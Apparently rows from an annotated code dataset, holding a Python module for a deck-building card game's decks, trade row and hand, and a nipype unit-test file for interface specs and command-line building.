'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'su.si'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'su.si'], ['URL', 'su.im']] |
51 | # -*- coding: utf-8 -*-
"""
.. module:: deck
:synopsis: Encapsulates the behavior of card collections
.. moduleauthor:: Zach Mitchell dummy@email.com
"""
from random import shuffle
from typing import List
from .cards import (
Card,
CardFaction,
CardEffect,
CardAction,
CardTarget
)
from .cardrepo import CardRepo
from .exceptions import (
RealmsException,
MainDeckEmpty,
PlayerDeckEmpty,
PlayerDeckInitSize,
PlayerDeckInitContents,
UUIDNotFoundError,
HandInitError
)
from collections import Counter
from typing import NamedTuple
CardList = List[Card]
EffectList = List[CardEffect]
FactionList = List[CardFaction]
EffectRecord = NamedTuple('EffectRecord', [
('target', CardTarget),
('action', CardAction),
('value', int),
('uuid', str),
('provider', str)])
class PlayerDeck(object):
"""
Records the state of the player's deck
At any given point in time the player may have three piles of cards: undrawn cards, a
hand of cards, and a pile of used (discarded) cards. PlayerDeck records which cards are
in which pile, provides an interface from which a hand of cards can be assembled, and
shuffles the deck when necessary.
Parameters
----------
player_cards : List[Card]
The list of cards from which the player's starting deck will be constructed
Raises
------
PlayerDeckInitSize
Raised when constructing the deck with the wrong number of cards
PlayerDeckInitContents
Raised when constructing the deck with cards other than Vipers and Scouts
"""
starting_size = 10
def __init__(self, player_cards: CardList):
try:
self._validate_deck_size(player_cards)
self._validate_deck_contents(player_cards)
except RealmsException:
raise
self._undrawn: CardList = player_cards
shuffle(self._undrawn) # shuffled in place
self._discards: CardList = []
@staticmethod
def _validate_deck_size(cards: CardList) -> None:
"""Ensures that the starting deck contains the correct
number of cards
Parameters
----------
cards : CardList
The tentative starting deck
Raises
------
PlayerDeckInitSize
Raised if the tentative starting deck is not the correct size
"""
if len(cards) != PlayerDeck.starting_size:
raise PlayerDeckInitSize(len(cards))
return
@staticmethod
def _validate_deck_contents(cards) -> None:
"""Ensures that the tentative starting deck contains only Vipers and Scouts
Parameters
----------
cards : CardList
The tentative starting deck
Raises
------
PlayerDeckInitContents
Raised if the tentative starting deck contains cards other than Vipers or Scouts
"""
for c in cards:
if (c.name != 'Viper') and (c.name != 'Scout'):
raise PlayerDeckInitContents(c.name)
return
def _next_card(self) -> Card:
"""Produces the next card from the player's deck
Attempts to draw a card from the top of the undrawn pile. If
the undrawn pile is empty, the undrawn pile is replenished from
the discard pile and shuffled before attempting to draw a card again.
An attempt to draw a card from the undrawn pile while both the undrawn
pile and discard pile are empty will raise a ``PlayerDeckEmpty`` exception.
Returns
-------
Card
A card from the top of the undrawn pile
Raises
------
PlayerDeckEmpty
Raised when attempting to draw a card while both undrawn and discard
piles are empty
"""
if len(self._undrawn) > 0:
return self._undrawn.pop()
elif len(self._discards) > 0:
self._refill_undrawn()
return self._undrawn.pop()
else:
raise PlayerDeckEmpty
@property
def cards_remaining(self) -> int:
"""The total number of cards left in the undrawn and discard piles
Returns
-------
int
The number of cards left to draw from
"""
return len(self._undrawn) + len(self._discards)
def _refill_undrawn(self) -> None:
"""Refills the undrawn pile with cards from the discard pile
Note
----
The cards in the discard pile are shuffled before being placed
back into the undrawn pile
"""
self._undrawn: CardList = self._discards
shuffle(self._undrawn) # shuffled in place
self._discards: CardList = []
return
def discard(self, card: Card) -> None:
"""Sends the card to the discard pile
Parameters
----------
card : Card
The card to send to the discard pile
"""
self._discards.append(card)
return
def draw(self, num=5) -> CardList:
"""Draws the specified number of cards from the undrawn pile
Parameters
----------
num : int (Optional)
The number of cards to draw (Default is 5)
Returns
-------
List[Card]
The list of cards that were drawn
Raises
------
IndexError
Raised if no cards are left to draw, or the number of cards requested
is not a positive integer
Note
----
If there are cards remaining in the deck but there are fewer cards than
were requested, then as many cards as possible are returned.
"""
if (num <= 0) or (self.cards_remaining == 0) or (not isinstance(num, int)):
raise IndexError
cards: CardList = []
for _ in range(num):
try:
cards.append(self._next_card())
except PlayerDeckEmpty:
break
return cards
def _scrap(self, card):
"""
Permanently removes a card from the discard pile
"""
pass
class MainDeck(object):
"""The deck from which players can acquire cards
Parameters
----------
cardrepo : CardRepo
The repository from which the cards are obtained
"""
def __init__(self, cardrepo: CardRepo):
self._repo: CardRepo = cardrepo
self._cards: CardList = self._repo.main_deck_cards()
shuffle(self._cards)
return
def next_card(self) -> Card:
"""Produces the next card from the main deck
Returns
-------
Card
A card from the top of the main deck
Raises
------
MainDeckEmpty
Raised when attempting to draw a card when the deck is empty
"""
if len(self._cards) > 0:
return self._cards.pop()
else:
raise MainDeckEmpty
class TradeRow(object):
"""Presents the cards that players may acquire
Parameters
----------
maindeck : MainDeck
The deck from which the trade row is drawn
cardrepo : CardRepo
The repository from which cards are obtained
"""
def __init__(self, maindeck: MainDeck, cardrepo: CardRepo):
self._maindeck: MainDeck = maindeck
self._repo: CardRepo = cardrepo
self._explorer = None
self._cards = []
@property
def available(self) -> CardList:
"""Produces the list of all cards available for purchase
Returns
-------
List[Card]
The list of cards available for purchase
"""
return self.cards + [self.explorer]
@property
def cards(self) -> CardList:
"""Produces the list of cards available for purchase
from the main deck
Returns
-------
List[Card]
The list of available cards from the main deck
"""
while len(self._cards) < 5:
try:
card: Card = self._maindeck.next_card()
except MainDeckEmpty:
break
self._cards.append(card)
return self._cards
@property
def explorer(self) -> Card:
"""Produces the current Explorer available for purchase
Returns
-------
Card
The current Explorer
"""
if self._explorer is None:
self._explorer: Card = self._repo.new_explorer()
return self._explorer
def acquire(self, uuid: str) -> Card:
"""Produces the card with the specified UUID
Parameters
----------
uuid : str
The UUID of the card the player wishes to acquire
Returns
-------
Card
The card with the specified UUID
Raises
------
UUIDNotFoundError
Raised when the UUID of the requested card is not found
in the list of available cards
"""
cards_bools = [c.uuid == uuid for c in self.cards]
if True in cards_bools:
i = cards_bools.index(True)
return self._cards.pop(i)
elif self.explorer.uuid == uuid:
card = self._explorer
self._explorer = None
return card
else:
raise UUIDNotFoundError
def scrap(self, uuid: str) -> None:
"""Permanently removes a card from the trade row
Parameters
----------
uuid : str
The UUID of the card to remove
"""
cards_bools = [c.uuid == uuid for c in self.cards]
if True in cards_bools:
i = cards_bools.index(True)
del self._cards[i]
elif self.explorer.uuid == uuid:
self._explorer = None
else:
raise UUIDNotFoundError
return
class Hand(object):
"""The player's hand of cards
A Hand is made from a list of cards drawn from the undrawn pile of the player's deck,
as well as any bases that were played previously and have not been destroyed.
The processing of cards into a collection of effects is a multi-step process:
1. The basic effects are pulled from each card
2. The factions are tallied up to see which cards may activate their ally abilities
3. Ally abilities are pulled from each card
4. The effects are aggregated by their action types
5. Effects are applied in whatever order the user chooses
6. If cards are drawn as the result of an action, the effects list is updated
Parameters
----------
to_draw : int
The number of cards to draw initially
existing_bases : List[Card]
Any bases that were played previously and have not yet been destroyed
playerdeck : PlayerDeck
The player's deck
"""
def __init__(self, to_draw: int, existing_bases: CardList, playerdeck: PlayerDeck):
if (to_draw < 0) or (to_draw > 5):
raise HandInitError
try:
drawn: CardList = playerdeck.draw(to_draw)
except IndexError:
drawn: CardList = []
self.cards = drawn + existing_bases
self._playerdeck = playerdeck
return
@staticmethod
def _collect_basic_effects(cards: List[Card]) -> List[EffectRecord]:
"""Assembles a list of `EffectRecord`s from the cards in the hand
"""
basic_effects: List[EffectRecord] = []
for c in cards:
effects: List[CardEffect] = c.effects_basic
records = [EffectRecord(target=e.target,
action=e.action,
value=e.value,
uuid=e.uuid,
provider=c.uuid)
for e in effects]
basic_effects += records
return records
@staticmethod
def _collect_ally_factions(cards: List[Card]) -> List[CardFaction]:
"""Assembles a list of factions that should have their ally abilities activated
"""
factions: CardFaction = [c.faction for c in cards]
if CardFaction.ALL in factions:
return [CardFaction.BLOB, CardFaction.STAR, CardFaction.FEDERATION, CardFaction.MACHINE]
counts = Counter(factions)
allies: List[CardFaction] = [key for key in counts.keys()
if counts[key] > 1 and key != CardFaction.UNALIGNED]
return allies
@staticmethod
def _collect_ally_effects(cards: List[Card], facs: List[CardFaction]) -> List[EffectRecord]:
"""Assembles a list of the ally effects that are applicable
"""
ally_effects: List[EffectRecord] = []
for c in cards:
effects: List[CardEffect] = c.effects_ally
records = [EffectRecord(target=e.target,
action=e.action,
value=e.value,
uuid=e.uuid,
provider=c.uuid)
for e in effects if c.faction in facs]
ally_effects += records
return ally_effects
def _collect_effects(self) -> List[EffectRecord]:
"""Assembles a list of effects provided by the player's hand
"""
basic_effects: List[EffectRecord] = Hand._collect_basic_effects(self.cards)
ally_factions: List[CardFaction] = Hand._collect_ally_factions(self.cards)
ally_effects: List[EffectRecord] = Hand._collect_ally_effects(self.cards, ally_factions)
return basic_effects + ally_effects
| 13,773 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Zach Mitchell'], ['PERSON', 'EffectRecord'], ['PERSON', 'str'], ['PERSON', 'str'], ['PERSON', 'MainDeck = maindeck'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'PlayerDeck.st'], ['URL', 'c.na'], ['URL', 'c.na'], ['URL', 'c.na'], ['URL', 'self.ca'], ['URL', 'repo.ma'], ['URL', 'self.ca'], ['URL', 'maindeck.ne'], ['URL', 'repo.ne'], ['URL', 'self.ca'], ['URL', 'bools.in'], ['URL', 'self.ca'], ['URL', 'bools.in'], ['URL', 'self.ca'], ['URL', 'e.ac'], ['URL', 'e.va'], ['URL', 'CardFaction.AL'], ['URL', 'CardFaction.ST'], ['URL', 'CardFaction.MA'], ['URL', 'counts.ke'], ['URL', 'e.ac'], ['URL', 'e.va'], ['URL', 'self.ca'], ['URL', 'self.ca'], ['URL', 'self.ca']] |
52 | # -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
from __future__ import print_function, unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import open, str, bytes
import os
import tempfile
import shutil
import warnings
import simplejson as json
from nipype.testing import (assert_equal, assert_not_equal, assert_raises,
assert_true, assert_false, with_setup, package_check,
skipif, example_data)
import nipype.interfaces.base as nib
from nipype.utils.filemanip import split_filename
from nipype.interfaces.base import Undefined, config
from traits.testing.nose_tools import skip
import traits.api as traits
def test_bunch():
b = nib.Bunch()
yield assert_equal, b.__dict__, {}
b = nib.Bunch(a=1, b=[2, 3])
yield assert_equal, b.__dict__, {'a': 1, 'b': [2, 3]}
def test_bunch_attribute():
b = nib.Bunch(a=1, b=[2, 3], c=None)
yield assert_equal, b.a, 1
yield assert_equal, b.b, [2, 3]
yield assert_equal, b.c, None
def test_bunch_repr():
b = nib.Bunch(b=2, c=3, a=dict(n=1, m=2))
yield assert_equal, repr(b), "Bunch(a={'m': 2, 'n': 1}, b=2, c=3)"
def test_bunch_methods():
b = nib.Bunch(a=2)
b.update(a=3)
newb = b.dictcopy()
yield assert_equal, b.a, 3
yield assert_equal, b.get('a'), 3
yield assert_equal, b.get('badkey', 'otherthing'), 'otherthing'
yield assert_not_equal, b, newb
yield assert_equal, type(dict()), type(newb)
yield assert_equal, newb['a'], 3
def test_bunch_hash():
# NOTE: Since the path to the json file is included in the Bunch,
# the hash will be unique to each machine.
pth = os.path.split(os.path.abspath(__file__))[0]
json_pth = os.path.join(pth, 'realign_json.json')
b = nib.Bunch(infile=json_pth,
otherthing='blue',
yat=True)
newbdict, bhash = b._get_bunch_hash()
yield assert_equal, bhash, 'PI:KEY'
# Make sure the hash stored in the json file for `infile` is correct.
jshash = nib.md5()
with open(json_pth, 'r') as fp:
jshash.update(fp.read().encode('utf-8'))
yield assert_equal, newbdict['infile'][0][1], jshash.hexdigest()
yield assert_equal, newbdict['yat'], True
# create a temp file
# global tmp_infile, tmp_dir
# tmp_infile = None
# tmp_dir = None
def setup_file():
# global tmp_infile, tmp_dir
tmp_dir = tempfile.mkdtemp()
tmp_infile = os.path.join(tmp_dir, 'foo.txt')
with open(tmp_infile, 'w') as fp:
fp.writelines(['123456789'])
return tmp_infile
def teardown_file(tmp_dir):
shutil.rmtree(tmp_dir)
def test_TraitedSpec():
yield assert_true, nib.TraitedSpec().get_hashval()
yield assert_equal, nib.TraitedSpec().__repr__(), '\n\n'
class spec(nib.TraitedSpec):
foo = nib.traits.Int
goo = nib.traits.Float(usedefault=True)
yield assert_equal, spec().foo, Undefined
yield assert_equal, spec().goo, 0.0
specfunc = lambda x: spec(hoo=x)
yield assert_raises, nib.traits.TraitError, specfunc, 1
infields = spec(foo=1)
hashval = ([('foo', 1), ('goo', '0.0000000000')], 'PI:KEY')
yield assert_equal, infields.get_hashval(), hashval
# yield assert_equal, infields.hashval[1], hashval[1]
yield assert_equal, infields.__repr__(), '\nfoo = 1\ngoo = 0.0\n'
@skip
def test_TraitedSpec_dynamic():
from pickle import dumps, loads
a = nib.BaseTraitedSpec()
a.add_trait('foo', nib.traits.Int)
a.foo = 1
assign_a = lambda: setattr(a, 'foo', 'a')
yield assert_raises, Exception, assign_a
pkld_a = dumps(a)
unpkld_a = loads(pkld_a)
assign_a_again = lambda: setattr(unpkld_a, 'foo', 'a')
yield assert_raises, Exception, assign_a_again
def test_TraitedSpec_logic():
class spec3(nib.TraitedSpec):
_xor_inputs = ('foo', 'bar')
foo = nib.traits.Int(xor=_xor_inputs,
desc='foo or bar, not both')
bar = nib.traits.Int(xor=_xor_inputs,
desc='bar or foo, not both')
kung = nib.traits.Float(requires=('foo',),
position=0,
desc='kung foo')
class out3(nib.TraitedSpec):
output = nib.traits.Int
class MyInterface(nib.BaseInterface):
input_spec = spec3
output_spec = out3
myif = MyInterface()
yield assert_raises, TypeError, setattr(myif.inputs, 'kung', 10.0)
myif.inputs.foo = 1
yield assert_equal, myif.inputs.foo, 1
set_bar = lambda: setattr(myif.inputs, 'bar', 1)
yield assert_raises, IOError, set_bar
yield assert_equal, myif.inputs.foo, 1
myif.inputs.kung = 2
yield assert_equal, myif.inputs.kung, 2.0
def test_deprecation():
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec1(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='0.1')
spec_instance = DeprecationSpec1()
set_foo = lambda: setattr(spec_instance, 'foo', 1)
yield assert_raises, nib.TraitError, set_foo
yield assert_equal, len(w), 0, 'no warnings, just errors'
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec1numeric(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='0.1')
spec_instance = DeprecationSpec1numeric()
set_foo = lambda: setattr(spec_instance, 'foo', 1)
yield assert_raises, nib.TraitError, set_foo
yield assert_equal, len(w), 0, 'no warnings, just errors'
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec2(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='100', new_name='bar')
spec_instance = DeprecationSpec2()
set_foo = lambda: setattr(spec_instance, 'foo', 1)
yield assert_raises, nib.TraitError, set_foo
yield assert_equal, len(w), 0, 'no warnings, just errors'
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec3(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='1000', new_name='bar')
bar = nib.traits.Int()
spec_instance = DeprecationSpec3()
not_raised = True
try:
spec_instance.foo = 1
except nib.TraitError:
not_raised = False
yield assert_true, not_raised
yield assert_equal, len(w), 1, 'deprecated warning 1 %s' % [w1.message for w1 in w]
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec3(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='1000', new_name='bar')
bar = nib.traits.Int()
spec_instance = DeprecationSpec3()
not_raised = True
try:
spec_instance.foo = 1
except nib.TraitError:
not_raised = False
yield assert_true, not_raised
yield assert_equal, spec_instance.foo, Undefined
yield assert_equal, spec_instance.bar, 1
yield assert_equal, len(w), 1, 'deprecated warning 2 %s' % [w1.message for w1 in w]
def test_namesource():
tmp_infile = setup_file()
tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec2(nib.CommandLineInputSpec):
moo = nib.File(name_source=['doo'], hash_files=False, argstr="%s",
position=2)
doo = nib.File(exists=True, argstr="%s", position=1)
goo = traits.Int(argstr="%d", position=4)
poo = nib.File(name_source=['goo'], hash_files=False, argstr="%s", position=3)
class TestName(nib.CommandLine):
_cmd = "mycommand"
input_spec = spec2
testobj = TestName()
testobj.inputs.doo = tmp_infile
testobj.inputs.goo = 99
yield assert_true, '%s_generated' % nme in testobj.cmdline
testobj.inputs.moo = "my_%s_template"
yield assert_true, 'my_%s_template' % nme in testobj.cmdline
os.chdir(pwd)
teardown_file(tmpd)
def test_chained_namesource():
tmp_infile = setup_file()
tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec2(nib.CommandLineInputSpec):
doo = nib.File(exists=True, argstr="%s", position=1)
moo = nib.File(name_source=['doo'], hash_files=False, argstr="%s",
position=2, name_template='%s_mootpl')
poo = nib.File(name_source=['moo'], hash_files=False,
argstr="%s", position=3)
class TestName(nib.CommandLine):
_cmd = "mycommand"
input_spec = spec2
testobj = TestName()
testobj.inputs.doo = tmp_infile
res = testobj.cmdline
yield assert_true, '%s' % tmp_infile in res
yield assert_true, '%s_mootpl ' % nme in res
yield assert_true, '%s_mootpl_generated' % nme in res
os.chdir(pwd)
teardown_file(tmpd)
def test_cycle_namesource1():
tmp_infile = setup_file()
tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec3(nib.CommandLineInputSpec):
moo = nib.File(name_source=['doo'], hash_files=False, argstr="%s",
position=1, name_template='%s_mootpl')
poo = nib.File(name_source=['moo'], hash_files=False,
argstr="%s", position=2)
doo = nib.File(name_source=['poo'], hash_files=False,
argstr="%s", position=3)
class TestCycle(nib.CommandLine):
_cmd = "mycommand"
input_spec = spec3
# Check that an exception is raised
to0 = TestCycle()
not_raised = True
try:
to0.cmdline
except nib.NipypeInterfaceError:
not_raised = False
yield assert_false, not_raised
os.chdir(pwd)
teardown_file(tmpd)
def test_cycle_namesource2():
tmp_infile = setup_file()
tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec3(nib.CommandLineInputSpec):
moo = nib.File(name_source=['doo'], hash_files=False, argstr="%s",
position=1, name_template='%s_mootpl')
poo = nib.File(name_source=['moo'], hash_files=False,
argstr="%s", position=2)
doo = nib.File(name_source=['poo'], hash_files=False,
argstr="%s", position=3)
class TestCycle(nib.CommandLine):
_cmd = "mycommand"
input_spec = spec3
# Check that loop can be broken by setting one of the inputs
to1 = TestCycle()
to1.inputs.poo = tmp_infile
not_raised = True
try:
res = to1.cmdline
except nib.NipypeInterfaceError:
not_raised = False
print(res)
yield assert_true, not_raised
yield assert_true, '%s' % tmp_infile in res
yield assert_true, '%s_generated' % nme in res
yield assert_true, '%s_generated_mootpl' % nme in res
os.chdir(pwd)
teardown_file(tmpd)
def checknose():
"""check version of nose for known incompatability"""
mod = __import__('nose')
if mod.__versioninfo__[1] <= 11:
return 0
else:
return 1
@skipif(checknose)
def test_TraitedSpec_withFile():
tmp_infile = setup_file()
tmpd, nme = os.path.split(tmp_infile)
yield assert_true, os.path.exists(tmp_infile)
class spec2(nib.TraitedSpec):
moo = nib.File(exists=True)
doo = nib.traits.List(nib.File(exists=True))
infields = spec2(moo=tmp_infile, doo=[tmp_infile])
hashval = infields.get_hashval(hash_method='content')
yield assert_equal, hashval[1], 'PI:KEY'
teardown_file(tmpd)
@skipif(checknose)
def test_TraitedSpec_withNoFileHashing():
tmp_infile = setup_file()
tmpd, nme = os.path.split(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
yield assert_true, os.path.exists(tmp_infile)
class spec2(nib.TraitedSpec):
moo = nib.File(exists=True, hash_files=False)
doo = nib.traits.List(nib.File(exists=True))
infields = spec2(moo=nme, doo=[tmp_infile])
hashval = infields.get_hashval(hash_method='content')
yield assert_equal, hashval[1], 'PI:KEY'
class spec3(nib.TraitedSpec):
moo = nib.File(exists=True, name_source="doo")
doo = nib.traits.List(nib.File(exists=True))
infields = spec3(moo=nme, doo=[tmp_infile])
hashval1 = infields.get_hashval(hash_method='content')
class spec4(nib.TraitedSpec):
moo = nib.File(exists=True)
doo = nib.traits.List(nib.File(exists=True))
infields = spec4(moo=nme, doo=[tmp_infile])
hashval2 = infields.get_hashval(hash_method='content')
yield assert_not_equal, hashval1[1], hashval2[1]
os.chdir(pwd)
teardown_file(tmpd)
def test_Interface():
yield assert_equal, nib.Interface.input_spec, None
yield assert_equal, nib.Interface.output_spec, None
yield assert_raises, NotImplementedError, nib.Interface
yield assert_raises, NotImplementedError, nib.Interface.help
yield assert_raises, NotImplementedError, nib.Interface._inputs_help
yield assert_raises, NotImplementedError, nib.Interface._outputs_help
yield assert_raises, NotImplementedError, nib.Interface._outputs
class DerivedInterface(nib.Interface):
def __init__(self):
pass
nif = DerivedInterface()
yield assert_raises, NotImplementedError, nif.run
yield assert_raises, NotImplementedError, nif.aggregate_outputs
yield assert_raises, NotImplementedError, nif._list_outputs
yield assert_raises, NotImplementedError, nif._get_filecopy_info
def test_BaseInterface():
yield assert_equal, nib.BaseInterface.help(), None
yield assert_equal, nib.BaseInterface._get_filecopy_info(), []
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
goo = nib.traits.Int(desc='a random int', mandatory=True)
moo = nib.traits.Int(desc='a random int', mandatory=False)
hoo = nib.traits.Int(desc='a random int', usedefault=True)
zoo = nib.File(desc='a file', copyfile=False)
woo = nib.File(desc='a file', copyfile=True)
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class DerivedInterface(nib.BaseInterface):
input_spec = InputSpec
yield assert_equal, DerivedInterface.help(), None
yield assert_true, 'moo' in ''.join(DerivedInterface._inputs_help())
yield assert_equal, DerivedInterface()._outputs(), None
yield assert_equal, DerivedInterface._get_filecopy_info()[0]['key'], 'woo'
yield assert_true, DerivedInterface._get_filecopy_info()[0]['copy']
yield assert_equal, DerivedInterface._get_filecopy_info()[1]['key'], 'zoo'
yield assert_false, DerivedInterface._get_filecopy_info()[1]['copy']
yield assert_equal, DerivedInterface().inputs.foo, Undefined
yield assert_raises, ValueError, DerivedInterface()._check_mandatory_inputs
yield assert_equal, DerivedInterface(goo=1)._check_mandatory_inputs(), None
yield assert_raises, ValueError, DerivedInterface().run
yield assert_raises, NotImplementedError, DerivedInterface(goo=1).run
class DerivedInterface2(DerivedInterface):
output_spec = OutputSpec
def _run_interface(self, runtime):
return runtime
yield assert_equal, DerivedInterface2.help(), None
yield assert_equal, DerivedInterface2()._outputs().foo, Undefined
yield assert_raises, NotImplementedError, DerivedInterface2(goo=1).run
nib.BaseInterface.input_spec = None
yield assert_raises, Exception, nib.BaseInterface
def test_BaseInterface_load_save_inputs():
tmp_dir = tempfile.mkdtemp()
tmp_json = os.path.join(tmp_dir, 'settings.json')
class InputSpec(nib.TraitedSpec):
input1 = nib.traits.Int()
input2 = nib.traits.Float()
input3 = nib.traits.Bool()
input4 = nib.traits.Str()
class DerivedInterface(nib.BaseInterface):
input_spec = InputSpec
def __init__(self, **inputs):
super(DerivedInterface, self).__init__(**inputs)
inputs_dict = {'input1': 12, 'input3': True,
'input4': 'some string'}
bif = DerivedInterface(**inputs_dict)
bif.save_inputs_to_json(tmp_json)
bif2 = DerivedInterface()
bif2.load_inputs_from_json(tmp_json)
yield assert_equal, bif2.inputs.get_traitsfree(), inputs_dict
bif3 = DerivedInterface(from_file=tmp_json)
yield assert_equal, bif3.inputs.get_traitsfree(), inputs_dict
inputs_dict2 = inputs_dict.copy()
inputs_dict2.update({'input4': 'some other string'})
bif4 = DerivedInterface(from_file=tmp_json, input4=inputs_dict2['input4'])
yield assert_equal, bif4.inputs.get_traitsfree(), inputs_dict2
bif5 = DerivedInterface(input4=inputs_dict2['input4'])
bif5.load_inputs_from_json(tmp_json, overwrite=False)
yield assert_equal, bif5.inputs.get_traitsfree(), inputs_dict2
bif6 = DerivedInterface(input4=inputs_dict2['input4'])
bif6.load_inputs_from_json(tmp_json)
yield assert_equal, bif6.inputs.get_traitsfree(), inputs_dict
# test get hashval in a complex interface
from nipype.interfaces.ants import Registration
settings = example_data(example_data('smri_ants_registration_settings.json'))
with open(settings) as setf:
data_dict = json.load(setf)
tsthash = Registration()
tsthash.load_inputs_from_json(settings)
yield assert_equal, {}, check_dict(data_dict, tsthash.inputs.get_traitsfree())
tsthash2 = Registration(from_file=settings)
yield assert_equal, {}, check_dict(data_dict, tsthash2.inputs.get_traitsfree())
_, hashvalue = tsthash.inputs.get_hashval(hash_method='timestamp')
yield assert_equal, 'ec5755e07287e04a4b409e03b77a517c', hashvalue
def test_input_version():
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
obj = DerivedInterface1()
yield assert_not_raises, obj._check_version_requirements, obj.inputs
config.set('execution', 'stop_on_unknown_version', True)
yield assert_raises, Exception, obj._check_version_requirements, obj.inputs
config.set_default_config()
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.8'
obj = DerivedInterface1()
obj.inputs.foo = 1
yield assert_raises, Exception, obj._check_version_requirements
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.10'
obj = DerivedInterface1()
yield assert_not_raises, obj._check_version_requirements, obj.inputs
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.9'
obj = DerivedInterface1()
obj.inputs.foo = 1
not_raised = True
yield assert_not_raises, obj._check_version_requirements, obj.inputs
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', max_ver='0.7')
class DerivedInterface2(nib.BaseInterface):
input_spec = InputSpec
_version = '0.8'
obj = DerivedInterface2()
obj.inputs.foo = 1
yield assert_raises, Exception, obj._check_version_requirements
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', max_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.9'
obj = DerivedInterface1()
obj.inputs.foo = 1
not_raised = True
yield assert_not_raises, obj._check_version_requirements, obj.inputs
def test_output_version():
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
output_spec = OutputSpec
_version = '0.10'
obj = DerivedInterface1()
yield assert_equal, obj._check_version_requirements(obj._outputs()), []
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.11')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
output_spec = OutputSpec
_version = '0.10'
obj = DerivedInterface1()
yield assert_equal, obj._check_version_requirements(obj._outputs()), ['foo']
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.11')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
output_spec = OutputSpec
_version = '0.10'
def _run_interface(self, runtime):
return runtime
def _list_outputs(self):
return {'foo': 1}
obj = DerivedInterface1()
yield assert_raises, KeyError, obj.run
def test_Commandline():
yield assert_raises, Exception, nib.CommandLine
ci = nib.CommandLine(command='which')
yield assert_equal, ci.cmd, 'which'
yield assert_equal, ci.inputs.args, Undefined
ci2 = nib.CommandLine(command='which', args='ls')
yield assert_equal, ci2.cmdline, 'which ls'
ci3 = nib.CommandLine(command='echo')
ci3.inputs.environ = {'MYENV': 'foo'}
res = ci3.run()
yield assert_equal, res.runtime.environ['MYENV'], 'foo'
yield assert_equal, res.outputs, None
class CommandLineInputSpec1(nib.CommandLineInputSpec):
foo = nib.Str(argstr='%s', desc='a str')
goo = nib.traits.Bool(argstr='-g', desc='a bool', position=0)
hoo = nib.traits.List(argstr='-l %s', desc='a list')
moo = nib.traits.List(argstr='-i %d...', desc='a repeated list',
position=-1)
noo = nib.traits.Int(argstr='-x %d', desc='an int')
roo = nib.traits.Str(desc='not on command line')
soo = nib.traits.Bool(argstr="-soo")
nib.CommandLine.input_spec = CommandLineInputSpec1
ci4 = nib.CommandLine(command='cmd')
ci4.inputs.foo = 'foo'
ci4.inputs.goo = True
ci4.inputs.hoo = ['a', 'b']
ci4.inputs.moo = [1, 2, 3]
ci4.inputs.noo = 0
ci4.inputs.roo = 'hello'
ci4.inputs.soo = False
cmd = ci4._parse_inputs()
yield assert_equal, cmd[0], '-g'
yield assert_equal, cmd[-1], '-i 1 -i 2 -i 3'
yield assert_true, 'hello' not in ' '.join(cmd)
yield assert_true, '-soo' not in ' '.join(cmd)
ci4.inputs.soo = True
cmd = ci4._parse_inputs()
yield assert_true, '-soo' in ' '.join(cmd)
class CommandLineInputSpec2(nib.CommandLineInputSpec):
foo = nib.File(argstr='%s', desc='a str', genfile=True)
nib.CommandLine.input_spec = CommandLineInputSpec2
ci5 = nib.CommandLine(command='cmd')
yield assert_raises, NotImplementedError, ci5._parse_inputs
class DerivedClass(nib.CommandLine):
input_spec = CommandLineInputSpec2
